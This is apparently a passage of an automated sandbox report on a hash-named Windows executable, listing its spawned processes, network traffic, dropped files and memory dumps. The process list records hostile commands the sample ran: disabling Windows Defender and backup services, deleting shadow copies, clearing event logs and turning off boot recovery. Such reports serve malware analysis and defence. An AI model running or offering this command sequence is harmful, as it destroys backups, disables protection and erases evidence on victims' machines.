PID 2060 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12a5d" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12a5d" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/1064-115-0x0000000000000000-mapping.dmp

memory/1192-116-0x0000000000000000-mapping.dmp

memory/3580-118-0x0000000000000000-mapping.dmp

memory/512-117-0x0000000000000000-mapping.dmp

memory/924-119-0x0000000000000000-mapping.dmp

memory/1480-120-0x0000000000000000-mapping.dmp

memory/2080-121-0x0000000000000000-mapping.dmp

memory/4044-122-0x0000000000000000-mapping.dmp

memory/4020-123-0x0000000000000000-mapping.dmp

memory/3416-124-0x0000000000000000-mapping.dmp

memory/3216-125-0x0000000000000000-mapping.dmp

memory/2448-126-0x0000000000000000-mapping.dmp

memory/2836-127-0x0000000000000000-mapping.dmp

memory/2380-128-0x0000000000000000-mapping.dmp

memory/1060-129-0x0000000000000000-mapping.dmp

memory/3244-130-0x0000000000000000-mapping.dmp

memory/2176-131-0x0000000000000000-mapping.dmp

memory/3156-132-0x0000000000000000-mapping.dmp

memory/4092-133-0x0000000000000000-mapping.dmp

memory/736-134-0x0000000000000000-mapping.dmp

memory/592-135-0x0000000000000000-mapping.dmp

memory/1100-136-0x0000000000000000-mapping.dmp

memory/944-137-0x0000000000000000-mapping.dmp

memory/2572-138-0x0000000000000000-mapping.dmp

memory/1240-139-0x0000000000000000-mapping.dmp

memory/2320-140-0x0000000000000000-mapping.dmp

memory/1712-141-0x0000000000000000-mapping.dmp

memory/1920-142-0x0000000000000000-mapping.dmp

memory/988-143-0x0000000000000000-mapping.dmp

memory/2392-144-0x0000000000000000-mapping.dmp

memory/4056-145-0x0000000000000000-mapping.dmp

memory/3192-146-0x0000000000000000-mapping.dmp

memory/2260-147-0x0000000000000000-mapping.dmp

memory/320-148-0x0000000000000000-mapping.dmp

memory/2952-149-0x0000000000000000-mapping.dmp

memory/3080-150-0x0000000000000000-mapping.dmp

memory/3880-151-0x0000000000000000-mapping.dmp

memory/1344-152-0x0000000000000000-mapping.dmp

memory/1448-153-0x0000000000000000-mapping.dmp

memory/1188-154-0x0000000000000000-mapping.dmp

memory/820-155-0x0000000000000000-mapping.dmp

memory/68-156-0x0000000000000000-mapping.dmp

memory/504-157-0x0000000000000000-mapping.dmp

memory/4080-158-0x0000000000000000-mapping.dmp

memory/3764-159-0x0000000000000000-mapping.dmp

memory/2536-160-0x0000000000000000-mapping.dmp

memory/2816-161-0x0000000000000000-mapping.dmp

memory/2560-162-0x0000000000000000-mapping.dmp

memory/404-163-0x0000000000000000-mapping.dmp

memory/3852-164-0x0000000000000000-mapping.dmp

memory/1200-165-0x0000000000000000-mapping.dmp

memory/3776-166-0x0000000000000000-mapping.dmp

memory/3632-167-0x0000000000000000-mapping.dmp

memory/2440-168-0x0000000000000000-mapping.dmp

memory/2340-169-0x0000000000000000-mapping.dmp

memory/1648-170-0x0000000000000000-mapping.dmp

memory/1932-171-0x0000000000000000-mapping.dmp

memory/3180-172-0x0000000000000000-mapping.dmp

memory/2876-173-0x0000000000000000-mapping.dmp

memory/3796-174-0x0000000000000000-mapping.dmp

memory/1668-175-0x0000000000000000-mapping.dmp

memory/1984-176-0x0000000000000000-mapping.dmp

memory/2228-177-0x0000000000000000-mapping.dmp

memory/488-178-0x0000000000000000-mapping.dmp

memory/3464-180-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-179-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-181-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-182-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-183-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-184-0x0000025DD9E60000-0x0000025DD9E62000-memory.dmp

memory/3464-186-0x0000025DD9D80000-0x0000025DD9DA2000-memory.dmp

memory/3464-185-0x0000025DD9E63000-0x0000025DD9E65000-memory.dmp

memory/3464-187-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-188-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-189-0x0000025DDA900000-0x0000025DDA976000-memory.dmp

memory/3464-190-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/3464-194-0x0000025DD9E66000-0x0000025DD9E68000-memory.dmp

memory/3464-215-0x0000025DC1710000-0x0000025DC1712000-memory.dmp

memory/2252-217-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/2252-218-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-219-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-220-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-221-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-222-0x000001568BFC0000-0x000001568BFE2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d65dd086c3931a681bf45bae39b36f8
SHA1 7776ec7306249b8a555f880b350173106a26598e
SHA256 7c6b01d70f064deb736da06cf36f4793f693fbe266c1a17da6821f65677b7b6c
SHA512 0cc037ddc88e4fac059ae56114e4d4d6ba4dc92e7609576e754af198d814caed7bfc54977aab2cf97f102e1decf2a4d8c668bbfd09123773c19da2d60667a692

memory/2252-224-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-225-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-226-0x00000156A4EC0000-0x00000156A4F36000-memory.dmp

memory/2252-228-0x000001568BE80000-0x000001568BE82000-memory.dmp

memory/3464-227-0x0000025DD9E68000-0x0000025DD9E69000-memory.dmp

memory/2252-229-0x000001568BE83000-0x000001568BE85000-memory.dmp

memory/2252-230-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-234-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-235-0x000001568A4E0000-0x000001568A4E2000-memory.dmp

memory/2252-256-0x000001568BE86000-0x000001568BE88000-memory.dmp

memory/2252-257-0x000001568BE88000-0x000001568BE89000-memory.dmp